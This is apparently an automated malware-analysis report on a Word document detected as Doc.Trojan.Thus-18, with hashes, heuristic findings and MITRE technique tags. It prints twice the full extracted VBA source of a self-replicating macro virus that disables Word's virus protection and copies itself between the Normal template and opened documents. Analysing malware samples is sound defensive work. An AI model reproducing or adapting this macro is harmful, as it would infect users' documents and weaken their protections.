Office (OLE) malware analysis — malicious · ff2e38ffa7822672

MALICIOUS

Office (OLE)

33.0 KB Created: 1997-09-17 10:18:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: d742b7a192608200192e97a139f42dd1 SHA-1: be9c8a2ed5e4ea5799a0edb21f7aabeeac21775d SHA-256: ff2e38ffa7822672d1a461f18d6bc4aebb97e67aed155412570b170f9356a42e

120 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The sample is identified as malicious by ClamAV with the signature Doc.Trojan.Thus-18. A critical heuristic detected a Document_Open VBA macro, which is often used to execute malicious code upon document opening. The macro attempts to overwrite the Normal.dot template, suggesting an attempt to establish persistence or spread the malicious macro to other documents.

Heuristics 3

ClamAV: Doc.Trojan.Thus-18 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Thus-18
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1223 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	1223 bytes
SHA-256: `05270d8ef856e02cfd513fc9dc49da68d4fac557c6f3009fb7e89df979f1ac58`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True 'Please do NOT modify this file ! Private Sub Document_Open() On Error Resume Next Options.VirusProtection = False Set ad = ActiveDocument.VBProject.VBComponents(1).CodeModule Set nt = NormalTemplate.VBProject.VBComponents(1).CodeModule Dim mark As String mark = NormalTemplate.VBProject.VBComponents(1).CodeModule.Lines(1, 1) If mark = "'Please do NOT modify this file !" Then ad.DeleteLines 1, ad.CountOfLines ad.InsertLines 1, nt.Lines(1, nt.CountOfLines) Else NormalTemplate.VBProject.VBComponents(1).CodeModule.DeleteLines 1, nt.CountOfLines nt.InsertLines 1, "'Please do NOT modify this file !" nt.InsertLines 2, ad.Lines(2, ad.CountOfLines) If Day(Now) = 12 Then MsgBox "It's TOO much violence in this world!" & Chr(10) & Chr(13) & "Have MOT to stop it!", vbCritical, "I say:" NormalTemplate.Save ActiveDocument.Save ThisDocument.Save ' [MOT] (C) Dr.Copy 1999 End If End Sub

SHA-256: 05270d8ef856e02cfd513fc9dc49da68d4fac557c6f3009fb7e89df979f1ac58

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'Please do NOT modify this file !
Private Sub Document_Open()
On Error Resume Next

Options.VirusProtection = False

Set ad = ActiveDocument.VBProject.VBComponents(1).CodeModule
Set nt = NormalTemplate.VBProject.VBComponents(1).CodeModule

Dim mark As String
mark = NormalTemplate.VBProject.VBComponents(1).CodeModule.Lines(1, 1)
If mark = "'Please do NOT modify this file !" Then

 ad.DeleteLines 1, ad.CountOfLines
 ad.InsertLines 1, nt.Lines(1, nt.CountOfLines)
 
Else
NormalTemplate.VBProject.VBComponents(1).CodeModule.DeleteLines 1, nt.CountOfLines
nt.InsertLines 1, "'Please do NOT modify this file !"
nt.InsertLines 2, ad.Lines(2, ad.CountOfLines)

If Day(Now) = 12 Then MsgBox "It's TOO much violence in this world!" & Chr(10) & Chr(13) & "Have MOT to stop it!", vbCritical, "I say:"

NormalTemplate.Save
ActiveDocument.Save
ThisDocument.Save


' [MOT] (C) Dr.Copy 1999

End If




End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.